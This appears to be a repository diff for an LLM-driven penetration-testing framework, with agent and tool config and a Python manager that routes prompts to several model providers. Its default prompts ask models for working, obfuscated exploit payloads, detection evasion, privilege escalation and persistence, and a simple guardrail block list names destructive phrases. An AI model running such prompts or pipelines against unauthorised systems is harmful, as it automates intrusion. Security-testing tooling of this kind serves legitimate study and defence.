|
||||||
|
"tools_allowed": ["burpsuite"],
|
||||||
|
"description": "Identifies and leverages replay attack vectors in network traffic or authentication."
|
||||||
|
},
|
||||||
|
"pentest_generalist": {
|
||||||
|
"enabled": true,
|
||||||
|
"llm_profile": "gemini_pro_default",
|
||||||
|
"tools_allowed": ["nmap", "subfinder", "nuclei", "metasploit", "burpsuite", "sqlmap", "hydra"],
|
||||||
|
"description": "Performs comprehensive penetration tests across various domains."
|
||||||
|
},
|
||||||
|
"owasp_expert": {
|
||||||
|
"enabled": true,
|
||||||
|
"llm_profile": "gemini_pro_default",
|
||||||
|
"tools_allowed": ["burpsuite", "sqlmap"],
|
||||||
|
"description": "Specializes in assessing web applications against OWASP Top 10 vulnerabilities."
|
||||||
|
},
|
||||||
|
"cwe_expert": {
|
||||||
|
"enabled": true,
|
||||||
|
"llm_profile": "claude_opus_default",
|
||||||
|
"tools_allowed": [],
|
||||||
|
"description": "Analyzes code and reports for weaknesses based on MITRE CWE Top 25."
|
||||||
|
},
|
||||||
|
"malware_analyst": {
|
||||||
|
"enabled": true,
|
||||||
|
"llm_profile": "gpt_4o_default",
|
||||||
|
"tools_allowed": [],
|
||||||
|
"description": "Examines malware samples to understand functionality and identify IOCs."
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"methodologies": {
|
||||||
|
"owasp_top10": true,
|
||||||
|
"cwe_top25": true,
|
||||||
|
"network_pentest": true,
|
||||||
|
"ad_pentest": true,
|
||||||
|
"web_security": true
|
||||||
|
},
|
||||||
|
"tools": {
|
||||||
|
"nmap": "/usr/bin/nmap",
|
||||||
|
"metasploit": "/usr/bin/msfconsole",
|
||||||
|
"burpsuite": "/usr/bin/burpsuite",
|
||||||
|
"sqlmap": "/usr/bin/sqlmap",
|
||||||
|
"hydra": "/usr/bin/hydra",
|
||||||
|
"subfinder": "/usr/local/bin/subfinder",
|
||||||
|
"nuclei": "/usr/local/bin/nuclei"
|
||||||
|
},
|
||||||
|
"output": {
|
||||||
|
"format": "json",
|
||||||
|
"verbose": true,
|
||||||
|
"save_artifacts": true
|
||||||
|
}
|
||||||
|
}
|
||||||
0
core/__init__.py
Normal file
0
core/__init__.py
Normal file
651
core/llm_manager.py
Normal file
651
core/llm_manager.py
Normal file
@@ -0,0 +1,651 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
"""
|
||||||
|
LLM Manager - Unified interface for multiple LLM providers
|
||||||
|
Supports: Claude, GPT, Gemini, Ollama, and custom models
|
||||||
|
"""
|
||||||
|
|
||||||
|
import os
|
||||||
|
import json
|
||||||
|
import subprocess
|
||||||
|
from typing import Dict, List, Optional, Any
|
||||||
|
import logging
|
||||||
|
import requests
|
||||||
|
from pathlib import Path # Added for Path
|
||||||
|
import re # Added for regex operations
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class LLMManager:
|
||||||
|
"""Manage multiple LLM providers"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
"""Initialize LLM manager"""
|
||||||
|
self.config = config.get('llm', {})
|
||||||
|
self.default_profile_name = self.config.get('default_profile', 'gemini_pro_default')
|
||||||
|
self.profiles = self.config.get('profiles', {})
|
||||||
|
|
||||||
|
self.active_profile = self.profiles.get(self.default_profile_name, {})
|
||||||
|
|
||||||
|
# Load active profile settings
|
||||||
|
self.provider = self.active_profile.get('provider', 'gemini').lower()
|
||||||
|
self.model = self.active_profile.get('model', 'gemini-pro')
|
||||||
|
self.api_key = self._get_api_key(self.active_profile.get('api_key', ''))
|
||||||
|
self.temperature = self.active_profile.get('temperature', 0.7)
|
||||||
|
self.max_tokens = self.active_profile.get('max_tokens', 4096)
|
||||||
|
|
||||||
|
# New LLM parameters
|
||||||
|
self.input_token_limit = self.active_profile.get('input_token_limit', 4096)
|
||||||
|
self.output_token_limit = self.active_profile.get('output_token_limit', 4096)
|
||||||
|
self.cache_enabled = self.active_profile.get('cache_enabled', False)
|
||||||
|
self.search_context_level = self.active_profile.get('search_context_level', 'medium') # low, medium, high
|
||||||
|
self.pdf_support_enabled = self.active_profile.get('pdf_support_enabled', False)
|
||||||
|
self.guardrails_enabled = self.active_profile.get('guardrails_enabled', False)
|
||||||
|
self.hallucination_mitigation_strategy = self.active_profile.get('hallucination_mitigation_strategy', None)
|
||||||
|
|
||||||
|
|
||||||
|
# New prompt loading
|
||||||
|
|
||||||
|
|
||||||
|
self.json_prompts_file_path = Path("prompts/library.json")
|
||||||
|
|
||||||
|
|
||||||
|
self.md_prompts_dir_path = Path("prompts/md_library")
|
||||||
|
|
||||||
|
|
||||||
|
self.prompts = self._load_all_prompts() # New method to load both
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
logger.info(f"Initialized LLM Manager - Provider: {self.provider}, Model: {self.model}, Profile: {self.default_profile_name}")
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def _get_api_key(self, api_key_config: str) -> str:
|
||||||
|
|
||||||
|
|
||||||
|
"""Helper to get API key from config or environment variable"""
|
||||||
|
|
||||||
|
|
||||||
|
if api_key_config.startswith('${') and api_key_config.endswith('}'):
|
||||||
|
|
||||||
|
|
||||||
|
env_var = api_key_config[2:-1]
|
||||||
|
|
||||||
|
|
||||||
|
return os.getenv(env_var, '')
|
||||||
|
|
||||||
|
|
||||||
|
return api_key_config
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def _load_all_prompts(self) -> Dict:
|
||||||
|
|
||||||
|
|
||||||
|
"""Load prompts from both JSON library and Markdown library files."""
|
||||||
|
|
||||||
|
|
||||||
|
all_prompts = {
|
||||||
|
|
||||||
|
|
||||||
|
"json_prompts": {},
|
||||||
|
|
||||||
|
|
||||||
|
"md_prompts": {}
|
||||||
|
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Load from JSON library
|
||||||
|
|
||||||
|
|
||||||
|
if self.json_prompts_file_path.exists():
|
||||||
|
|
||||||
|
|
||||||
|
try:
|
||||||
|
|
||||||
|
|
||||||
|
with open(self.json_prompts_file_path, 'r') as f:
|
||||||
|
|
||||||
|
|
||||||
|
all_prompts["json_prompts"] = json.load(f)
|
||||||
|
|
||||||
|
|
||||||
|
logger.info(f"Loaded prompts from JSON library: {self.json_prompts_file_path}")
|
||||||
|
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
|
||||||
|
|
||||||
|
logger.error(f"Error loading prompts from {self.json_prompts_file_path}: {e}")
|
||||||
|
|
||||||
|
|
||||||
|
else:
|
||||||
|
|
||||||
|
|
||||||
|
logger.warning(f"JSON prompts file not found at {self.json_prompts_file_path}. Some AI functionalities might be limited.")
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Load from Markdown library
|
||||||
|
|
||||||
|
|
||||||
|
if self.md_prompts_dir_path.is_dir():
|
||||||
|
|
||||||
|
|
||||||
|
for md_file in self.md_prompts_dir_path.glob("*.md"):
|
||||||
|
|
||||||
|
|
||||||
|
try:
|
||||||
|
|
||||||
|
|
||||||
|
content = md_file.read_text()
|
||||||
|
|
||||||
|
|
||||||
|
prompt_name = md_file.stem # Use filename as prompt name
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
user_prompt_match = re.search(r"## User Prompt\n(.*?)(?=\n## System Prompt|\Z)", content, re.DOTALL)
|
||||||
|
|
||||||
|
|
||||||
|
system_prompt_match = re.search(r"## System Prompt\n(.*?)(?=\n## User Prompt|\Z)", content, re.DOTALL)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
user_prompt = user_prompt_match.group(1).strip() if user_prompt_match else ""
|
||||||
|
|
||||||
|
|
||||||
|
system_prompt = system_prompt_match.group(1).strip() if system_prompt_match else ""
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
if user_prompt or system_prompt:
|
||||||
|
|
||||||
|
|
||||||
|
all_prompts["md_prompts"][prompt_name] = {
|
||||||
|
|
||||||
|
|
||||||
|
"user_prompt": user_prompt,
|
||||||
|
|
||||||
|
|
||||||
|
"system_prompt": system_prompt
|
||||||
|
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
else:
|
||||||
|
|
||||||
|
|
||||||
|
logger.warning(f"No valid User or System Prompt found in {md_file.name}. Skipping.")
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
|
||||||
|
|
||||||
|
logger.error(f"Error loading prompt from {md_file.name}: {e}")
|
||||||
|
|
||||||
|
|
||||||
|
logger.info(f"Loaded {len(all_prompts['md_prompts'])} prompts from Markdown library.")
|
||||||
|
|
||||||
|
|
||||||
|
else:
|
||||||
|
|
||||||
|
|
||||||
|
logger.warning(f"Markdown prompts directory not found at {self.md_prompts_dir_path}. Some AI functionalities might be limited.")
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
return all_prompts
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def get_prompt(self, library_type: str, category: str, name: str, default: str = "") -> str:
|
||||||
|
|
||||||
|
|
||||||
|
"""Retrieve a specific prompt by library type, category, and name.
|
||||||
|
|
||||||
|
|
||||||
|
`library_type` can be "json_prompts" or "md_prompts".
|
||||||
|
|
||||||
|
|
||||||
|
`category` can be a JSON top-level key (e.g., 'exploitation') or an MD filename (e.g., 'red_team_agent').
|
||||||
|
|
||||||
|
|
||||||
|
`name` can be a JSON sub-key (e.g., 'ai_exploit_planning_user') or 'user_prompt'/'system_prompt' for MD.
|
||||||
|
|
||||||
|
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
return self.prompts.get(library_type, {}).get(category, {}).get(name, default)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def generate(self, prompt: str, system_prompt: Optional[str] = None) -> str:
|
||||||
|
"""Generate response from LLM and apply hallucination mitigation if configured."""
|
||||||
|
raw_response = ""
|
||||||
|
try:
|
||||||
|
if self.provider == 'claude':
|
||||||
|
raw_response = self._generate_claude(prompt, system_prompt)
|
||||||
|
elif self.provider == 'gpt':
|
||||||
|
raw_response = self._generate_gpt(prompt, system_prompt)
|
||||||
|
elif self.provider == 'gemini':
|
||||||
|
raw_response = self._generate_gemini(prompt, system_prompt)
|
||||||
|
elif self.provider == 'ollama':
|
||||||
|
raw_response = self._generate_ollama(prompt, system_prompt)
|
||||||
|
elif self.provider == 'gemini-cli':
|
||||||
|
raw_response = self._generate_gemini_cli(prompt, system_prompt)
|
||||||
|
else:
|
||||||
|
raise ValueError(f"Unsupported provider: {self.provider}")
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Error generating raw response: {e}")
|
||||||
|
return f"Error: {str(e)}"
|
||||||
|
|
||||||
|
if self.guardrails_enabled:
|
||||||
|
raw_response = self._apply_guardrails(raw_response) # Apply guardrails here
|
||||||
|
|
||||||
|
if self.hallucination_mitigation_strategy and self.hallucination_mitigation_strategy in ["grounding", "self_reflection", "consistency_check"]:
|
||||||
|
logger.debug(f"Applying hallucination mitigation strategy: {self.hallucination_mitigation_strategy}")
|
||||||
|
return self._mitigate_hallucination(raw_response, prompt, system_prompt)
|
||||||
|
|
||||||
|
return raw_response
|
||||||
|
|
||||||
|
def _apply_guardrails(self, response: str) -> str:
|
||||||
|
"""Applies basic guardrails to the LLM response."""
|
||||||
|
if not self.guardrails_enabled:
|
||||||
|
return response
|
||||||
|
|
||||||
|
logger.debug("Applying guardrails...")
|
||||||
|
# Example: Simple keyword filtering
|
||||||
|
harmful_keywords = ["malicious_exploit_command", "destroy_system", "wipe_data", "unauthorized_access"] # Placeholder keywords
|
||||||
|
|
||||||
|
for keyword in harmful_keywords:
|
||||||
|
if keyword in response.lower():
|
||||||
|
logger.warning(f"Guardrail triggered: Found potentially harmful keyword '{keyword}'. Response will be sanitized or flagged.")
|
||||||
|
# A more robust solution would involve redaction, re-prompting, or flagging for human review.
|
||||||
|
# For this example, we'll replace the keyword.
|
||||||
|
response = response.replace(keyword, "[REDACTED_HARMFUL_CONTENT]")
|
||||||
|
response = response.replace(keyword.upper(), "[REDACTED_HARMFUL_CONTENT]")
|
||||||
|
|
||||||
|
# Example: Length check (if response is excessively long and not expected)
|
||||||
|
# Using output_token_limit for a more accurate comparison
|
||||||
|
if len(response.split()) > self.output_token_limit * 1.5: # Roughly estimate tokens by word count
|
||||||
|
logger.warning("Guardrail triggered: Response is excessively long. Truncating or flagging.")
|
||||||
|
response = " ".join(response.split()[:int(self.output_token_limit * 1.5)]) + "\n[RESPONSE TRUNCATED BY GUARDRAIL]"
|
||||||
|
|
||||||
|
# Ethical check (can be another LLM call, but for simplicity, a fixed instruction)
|
||||||
|
# This is more about ensuring the tone and content align with ethical hacking principles.
|
||||||
|
# This is a very simplistic example. A real ethical check would be more nuanced.
|
||||||
|
# For now, just a log or a general check for explicit unethical instructions.
|
||||||
|
if any(bad_phrase in response.lower() for bad_phrase in ["perform illegal activity", "bypass security illegally"]):
|
||||||
|
logger.warning("Guardrail triggered: Response contains potentially unethical instructions. Flagging for review.")
|
||||||
|
response = "[UNETHICAL CONTENT FLAGGED FOR REVIEW]\n" + response
|
||||||
|
|
||||||
|
return response
|
||||||
|
|
||||||
|
def _mitigate_hallucination(self, raw_response: str, original_prompt: str, original_system_prompt: Optional[str]) -> str:
|
||||||
|
"""Applies configured hallucination mitigation strategy."""
|
||||||
|
strategy = self.hallucination_mitigation_strategy
|
||||||
|
|
||||||
|
# Temporarily disable mitigation to prevent infinite recursion when calling self.generate internally
|
||||||
|
original_mitigation_state = self.hallucination_mitigation_strategy
|
||||||
|
self.hallucination_mitigation_strategy = None
|
||||||
|
|
||||||
|
try:
|
||||||
|
if strategy == "grounding":
|
||||||
|
verification_prompt = (
|
||||||
|
f"Review the following response:\n\n---\n{raw_response}\n---\n\n"
|
||||||
|
f"Based *only* on the context provided in the original prompt (user: '{original_prompt}', system: '{original_system_prompt or "None"}'), "
|
||||||
|
f"is this response factual and directly supported by the context? If not, correct it to be factual. "
|
||||||
|
f"If the response is completely unsourced or makes claims beyond the context, state 'UNSOURCED'."
|
||||||
|
)
|
||||||
|
logger.debug("Applying grounding strategy: Re-prompting for factual verification.")
|
||||||
|
return self.generate(verification_prompt, "You are a fact-checker whose sole purpose is to verify LLM output against provided context.")
|
||||||
|
|
||||||
|
elif strategy == "self_reflection":
|
||||||
|
reflection_prompt = (
|
||||||
|
f"Critically review the following response for accuracy, logical consistency, and adherence to the original prompt's instructions:\n\n"
|
||||||
|
f"Original Prompt (User): {original_prompt}\n"
|
||||||
|
f"Original Prompt (System): {original_system_prompt or "None"}\n\n"
|
||||||
|
f"Generated Response: {raw_response}\n\n"
|
||||||
|
f"Identify any potential hallucinations, inconsistencies, or areas where the response might have deviated from facts or instructions. "
|
||||||
|
f"If you find issues, provide a corrected and more reliable version of the response. If the response is good, state 'ACCURATE'."
|
||||||
|
)
|
||||||
|
logger.debug("Applying self-reflection strategy: Re-prompting for self-critique.")
|
||||||
|
return self.generate(reflection_prompt, "You are an AI assistant designed to critically evaluate and improve other AI-generated content.")
|
||||||
|
|
||||||
|
elif strategy == "consistency_check":
|
||||||
|
logger.debug("Applying consistency check strategy: Generating multiple responses for comparison.")
|
||||||
|
responses = []
|
||||||
|
for i in range(3): # Generate 3 responses for consistency check
|
||||||
|
logger.debug(f"Generating response {i+1} for consistency check.")
|
||||||
|
res = self.generate(original_prompt, original_system_prompt)
|
||||||
|
responses.append(res)
|
||||||
|
|
||||||
|
if len(set(responses)) == 1:
|
||||||
|
return responses[0]
|
||||||
|
else:
|
||||||
|
logger.warning("Consistency check found varying responses. Attempting to synthesize a consistent answer.")
|
||||||
|
synthesis_prompt = (
|
||||||
|
f"Synthesize a single, consistent, and factual response from the following AI-generated options. "
|
||||||
|
f"Prioritize factual accuracy and avoid information present in only one response if contradictory. "
|
||||||
|
f"If there's significant disagreement, state the core disagreement.\n\n"
|
||||||
|
f"Options:\n" + "\n---\n".join(responses)
|
||||||
|
)
|
||||||
|
return self.generate(synthesis_prompt, "You are a highly analytical AI assistant tasked with synthesizing consistent information from multiple sources.")
|
||||||
|
|
||||||
|
return raw_response # Fallback if strategy not recognized or implemented
|
||||||
|
finally:
|
||||||
|
self.hallucination_mitigation_strategy = original_mitigation_state # Restore original state
|
||||||
|
|
||||||
|
def _generate_claude(self, prompt: str, system_prompt: Optional[str] = None) -> str:
|
||||||
|
"""Generate using Claude API"""
|
||||||
|
import anthropic
|
||||||
|
|
||||||
|
client = anthropic.Anthropic(api_key=self.api_key)
|
||||||
|
|
||||||
|
messages = [{"role": "user", "content": prompt}]
|
||||||
|
|
||||||
|
response = client.messages.create(
|
||||||
|
model=self.model,
|
||||||
|
max_tokens=self.max_tokens,
|
||||||
|
temperature=self.temperature,
|
||||||
|
system=system_prompt or "",
|
||||||
|
messages=messages
|
||||||
|
)
|
||||||
|
|
||||||
|
return response.content[0].text
|
||||||
|
|
||||||
|
def _generate_gpt(self, prompt: str, system_prompt: Optional[str] = None) -> str:
|
||||||
|
"""Generate using OpenAI GPT API"""
|
||||||
|
import openai
|
||||||
|
|
||||||
|
client = openai.OpenAI(api_key=self.api_key)
|
||||||
|
|
||||||
|
messages = []
|
||||||
|
if system_prompt:
|
||||||
|
messages.append({"role": "system", "content": system_prompt})
|
||||||
|
messages.append({"role": "user", "content": prompt})
|
||||||
|
|
||||||
|
response = client.chat.completions.create(
|
||||||
|
model=self.model,
|
||||||
|
messages=messages,
|
||||||
|
temperature=self.temperature,
|
||||||
|
max_tokens=self.max_tokens
|
||||||
|
)
|
||||||
|
|
||||||
|
return response.choices[0].message.content
|
||||||
|
|
||||||
|
def _generate_gemini(self, prompt: str, system_prompt: Optional[str] = None) -> str:
|
||||||
|
"""Generate using Google Gemini API"""
|
||||||
|
import google.generativeai as genai
|
||||||
|
|
||||||
|
genai.configure(api_key=self.api_key)
|
||||||
|
model = genai.GenerativeModel(self.model)
|
||||||
|
|
||||||
|
full_prompt = prompt
|
||||||
|
if system_prompt:
|
||||||
|
full_prompt = f"{system_prompt}\n\n{prompt}"
|
||||||
|
|
||||||
|
response = model.generate_content(
|
||||||
|
full_prompt,
|
||||||
|
generation_config={
|
||||||
|
'temperature': self.temperature,
|
||||||
|
'max_output_tokens': self.max_tokens,
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
|
return response.text
|
||||||
|
|
||||||
|
def _generate_gemini_cli(self, prompt: str, system_prompt: Optional[str] = None) -> str:
|
||||||
|
"""Generate using Gemini CLI"""
|
||||||
|
try:
|
||||||
|
full_prompt = prompt
|
||||||
|
if system_prompt:
|
||||||
|
full_prompt = f"{system_prompt}\n\n{prompt}"
|
||||||
|
|
||||||
|
# Use gemini CLI tool
|
||||||
|
cmd = ['gemini', 'chat', '-m', self.model]
|
||||||
|
|
||||||
|
result = subprocess.run(
|
||||||
|
cmd,
|
||||||
|
input=full_prompt.encode(),
|
||||||
|
capture_output=True,
|
||||||
|
timeout=120
|
||||||
|
)
|
||||||
|
|
||||||
|
if result.returncode == 0:
|
||||||
|
return result.stdout.decode().strip()
|
||||||
|
else:
|
||||||
|
error = result.stderr.decode().strip()
|
||||||
|
logger.error(f"Gemini CLI error: {error}")
|
||||||
|
return f"Error: {error}"
|
||||||
|
|
||||||
|
except subprocess.TimeoutExpired:
|
||||||
|
logger.error("Gemini CLI timeout")
|
||||||
|
return "Error: Request timeout"
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Gemini CLI error: {e}")
|
||||||
|
return f"Error: {str(e)}"
|
||||||
|
|
||||||
|
def _generate_ollama(self, prompt: str, system_prompt: Optional[str] = None) -> str:
|
||||||
|
"""Generate using Ollama local models"""
|
||||||
|
try:
|
||||||
|
url = "http://localhost:11434/api/generate"
|
||||||
|
|
||||||
|
data = {
|
||||||
|
"model": self.model,
|
||||||
|
"prompt": prompt,
|
||||||
|
"stream": False,
|
||||||
|
"options": {
|
||||||
|
"temperature": self.temperature,
|
||||||
|
"num_predict": self.max_tokens
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if system_prompt:
|
||||||
|
data["system"] = system_prompt
|
||||||
|
|
||||||
|
response = requests.post(url, json=data, timeout=120)
|
||||||
|
response.raise_for_status()
|
||||||
|
|
||||||
|
return response.json()["response"]
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Ollama error: {e}")
|
||||||
|
return f"Error: {str(e)}"
|
||||||
|
|
||||||
|
def analyze_vulnerability(self, vulnerability_data: Dict) -> Dict:
|
||||||
|
"""Analyze vulnerability and suggest exploits"""
|
||||||
|
# This prompt will be fetched from library.json later
|
||||||
|
prompt = self.get_prompt("json_prompts", "exploitation", "analyze_vulnerability_user", default=f"""
|
||||||
|
Analyze the following vulnerability data and provide exploitation recommendations:
|
||||||
|
|
||||||
|
Vulnerability: {json.dumps(vulnerability_data, indent=2)}
|
||||||
|
|
||||||
|
Provide:
|
||||||
|
1. Severity assessment (Critical/High/Medium/Low)
|
||||||
|
2. Exploitation difficulty
|
||||||
|
3. Potential impact
|
||||||
|
4. Recommended exploit techniques
|
||||||
|
5. Detection evasion strategies
|
||||||
|
6. Post-exploitation actions
|
||||||
|
|
||||||
|
Response in JSON format.
|
||||||
|
""")
|
||||||
|
system_prompt = self.get_prompt("json_prompts", "exploitation", "analyze_vulnerability_system", default="""You are an expert penetration tester and security researcher.
|
||||||
|
Analyze vulnerabilities and provide detailed, actionable exploitation strategies.
|
||||||
|
Consider OWASP, CWE, and MITRE ATT&CK frameworks.
|
||||||
|
Always include ethical considerations and legal boundaries.""")
|
||||||
|
|
||||||
|
response = self.generate(prompt, system_prompt)
|
||||||
|
|
||||||
|
try:
|
||||||
|
return json.loads(response)
|
||||||
|
except:
|
||||||
|
return {"raw_response": response}
|
||||||
|
|
||||||
|
def generate_payload(self, target_info: Dict, vulnerability_type: str) -> str:
|
||||||
|
"""Generate exploit payload"""
|
||||||
|
# This prompt will be fetched from library.json later
|
||||||
|
prompt = self.get_prompt("json_prompts", "exploitation", "generate_payload_user", default=f"""
|
||||||
|
Generate an exploit payload for the following scenario:
|
||||||
|
|
||||||
|
Target Information:
|
||||||
|
{json.dumps(target_info, indent=2)}
|
||||||
|
|
||||||
|
Vulnerability Type: {vulnerability_type}
|
||||||
|
|
||||||
|
Requirements:
|
||||||
|
1. Generate a working payload
|
||||||
|
2. Include obfuscation techniques
|
||||||
|
3. Add error handling
|
||||||
|
4. Ensure minimal detection footprint
|
||||||
|
5. Include cleanup procedures
|
||||||
|
|
||||||
|
Provide the payload code with detailed comments.
|
||||||
|
""")
|
||||||
|
system_prompt = self.get_prompt("json_prompts", "exploitation", "generate_payload_system", default="""You are an expert exploit developer.
|
||||||
|
Generate sophisticated, tested payloads that are effective yet responsible.
|
||||||
|
Always include safety mechanisms and ethical guidelines.""")
|
||||||
|
|
||||||
|
return self.generate(prompt, system_prompt)
|
||||||
|
|
||||||
|
def suggest_privilege_escalation(self, system_info: Dict) -> List[str]:
|
||||||
|
"""Suggest privilege escalation techniques"""
|
||||||
|
# This prompt will be fetched from library.json later
|
||||||
|
prompt = self.get_prompt("json_prompts", "privesc", "suggest_privilege_escalation_user", default=f"""
|
||||||
|
Based on the following system information, suggest privilege escalation techniques:
|
||||||
|
|
||||||
|
System Info:
|
||||||
|
{json.dumps(system_info, indent=2)}
|
||||||
|
|
||||||
|
Provide:
|
||||||
|
1. Top 5 privilege escalation vectors
|
||||||
|
2. Required tools and commands
|
||||||
|
3. Detection likelihood
|
||||||
|
4. Success probability
|
||||||
|
5. Alternative approaches
|
||||||
|
|
||||||
|
Response in JSON format with prioritized list.
|
||||||
|
""")
|
||||||
|
|
||||||
|
system_prompt = self.get_prompt("json_prompts", "privesc", "suggest_privilege_escalation_system", default="""You are a privilege escalation specialist.
|
||||||
|
Analyze system configurations and suggest effective escalation paths.
|
||||||
|
Consider Windows, Linux, and Active Directory environments.""")
|
||||||
|
|
||||||
|
response = self.generate(prompt, system_prompt)
|
||||||
|
|
||||||
|
try:
|
||||||
|
result = json.loads(response)
|
||||||
|
return result.get('techniques', [])
|
||||||
|
except:
|
||||||
|
return []
|
||||||
|
|
||||||
|
def analyze_network_topology(self, scan_results: Dict) -> Dict:
|
||||||
|
"""Analyze network topology and suggest attack paths"""
|
||||||
|
# This prompt will be fetched from library.json later
|
||||||
|
prompt = self.get_prompt("json_prompts", "network_recon", "analyze_network_topology_user", default=f"""
|
||||||
|
Analyze the network topology and suggest attack paths:
|
||||||
|
|
||||||
|
Scan Results:
|
||||||
|
{json.dumps(scan_results, indent=2)}
|
||||||
|
|
||||||
|
Provide:
|
||||||
|
1. Network architecture overview
|
||||||
|
2. Critical assets identification
|
||||||
|
3. Attack surface analysis
|
||||||
|
4. Recommended attack paths (prioritized)
|
||||||
|
5. Lateral movement opportunities
|
||||||
|
6. Persistence locations
|
||||||
|
|
||||||
|
Response in JSON format.
|
||||||
|
""")
|
||||||
|
|
||||||
|
system_prompt = self.get_prompt("json_prompts", "network_recon", "analyze_network_topology_system", default="""You are a network penetration testing expert.
|
||||||
|
Analyze network structures and identify optimal attack vectors.
|
||||||
|
Consider defense-in-depth and detection mechanisms.""")
|
||||||
|
|
||||||
|
response = self.generate(prompt, system_prompt)
|
||||||
|
|
||||||
|
try:
|
||||||
|
return json.loads(response)
|
||||||
|
except:
|
||||||
|
return {"raw_response": response}
|
||||||
|
|
||||||
|
def analyze_web_vulnerability(self, vulnerability_type: str, vulnerability_data: Dict) -> Dict:
|
||||||
|
"""Analyze a specific web vulnerability using the appropriate prompt from library.json"""
|
||||||
|
user_prompt_name = f"{vulnerability_type.lower()}_user"
|
||||||
|
system_prompt_name = f"{vulnerability_type.lower()}_system"
|
||||||
|
|
||||||
|
# Dynamically fetch user prompt, passing vulnerability_data
|
||||||
|
user_prompt_template = self.get_prompt("json_prompts", "vulnerability_testing", user_prompt_name)
|
||||||
|
if not user_prompt_template:
|
||||||
|
logger.warning(f"No user prompt found for vulnerability type: {vulnerability_type}")
|
||||||
|
return {"error": f"No user prompt template for {vulnerability_type}"}
|
||||||
|
|
||||||
|
# Replace placeholder in the user prompt template
|
||||||
|
if vulnerability_type.lower() == "ssrf":
|
||||||
|
prompt = user_prompt_template.format(http_data_json=json.dumps(vulnerability_data, indent=2))
|
||||||
|
elif vulnerability_type.lower() == "sql_injection":
|
||||||
|
prompt = user_prompt_template.format(input_data_json=json.dumps(vulnerability_data, indent=2))
|
||||||
|
elif vulnerability_type.lower() == "xss":
|
||||||
|
prompt = user_prompt_template.format(xss_data_json=json.dumps(vulnerability_data, indent=2))
|
||||||
|
elif vulnerability_type.lower() == "lfi":
|
||||||
|
prompt = user_prompt_template.format(lfi_data_json=json.dumps(vulnerability_data, indent=2))
|
||||||
|
elif vulnerability_type.lower() == "broken_object":
|
||||||
|
prompt = user_prompt_template.format(api_data_json=json.dumps(vulnerability_data, indent=2))
|
||||||
|
elif vulnerability_type.lower() == "broken_auth":
|
||||||
|
prompt = user_prompt_template.format(auth_data_json=json.dumps(vulnerability_data, indent=2))
|
||||||
|
else:
|
||||||
|
logger.warning(f"Unsupported vulnerability type for analysis: {vulnerability_type}")
|
||||||
|
return {"error": f"Unsupported vulnerability type: {vulnerability_type}"}
|
||||||
|
|
||||||
|
system_prompt = self.get_prompt("json_prompts", "vulnerability_testing", system_prompt_name)
|
||||||
|
if not system_prompt:
|
||||||
|
logger.warning(f"No system prompt found for vulnerability type: {vulnerability_type}")
|
||||||
|
# Use a generic system prompt if a specific one isn't found
|
||||||
|
system_prompt = "You are an expert web security tester. Analyze the provided data for vulnerabilities and offer exploitation steps and remediation."
|
||||||
|
|
||||||
|
response = self.generate(prompt, system_prompt)
|
||||||
|
|
||||||
|
try:
|
||||||
|
return json.loads(response)
|
||||||
|
except json.JSONDecodeError:
|
||||||
|
logger.error(f"Failed to decode JSON response for {vulnerability_type} analysis: {response}")
|
||||||
|
return {"raw_response": response}
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Error during {vulnerability_type} analysis: {e}")
|
||||||
|
return {"error": str(e), "raw_response": response}
|
||||||
|
|
||||||
|
|
||||||
0
custom_agents/__init__.py
Normal file
0
custom_agents/__init__.py
Normal file
83
custom_agents/example_agent.py
Normal file
83
custom_agents/example_agent.py
Normal file
@@ -0,0 +1,83 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
"""
|
||||||
|
Example Custom Agent for NeuroSploitv2
|
||||||
|
This demonstrates how to create custom agents for specific tasks
|
||||||
|
"""
|
||||||
|
|
||||||
|
import logging
|
||||||
|
from typing import Dict
|
||||||
|
from core.llm_manager import LLMManager
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class CustomAgent:
|
||||||
|
"""Example custom agent - Web API Security Scanner"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
"""Initialize custom agent"""
|
||||||
|
self.config = config
|
||||||
|
self.llm = LLMManager(config)
|
||||||
|
self.name = "WebAPIScanner"
|
||||||
|
logger.info(f"{self.name} initialized")
|
||||||
|
|
||||||
|
def execute(self, target: str, context: Dict) -> Dict:
|
||||||
|
"""Execute custom agent logic"""
|
||||||
|
logger.info(f"Running {self.name} on {target}")
|
||||||
|
|
||||||
|
results = {
|
||||||
|
"agent": self.name,
|
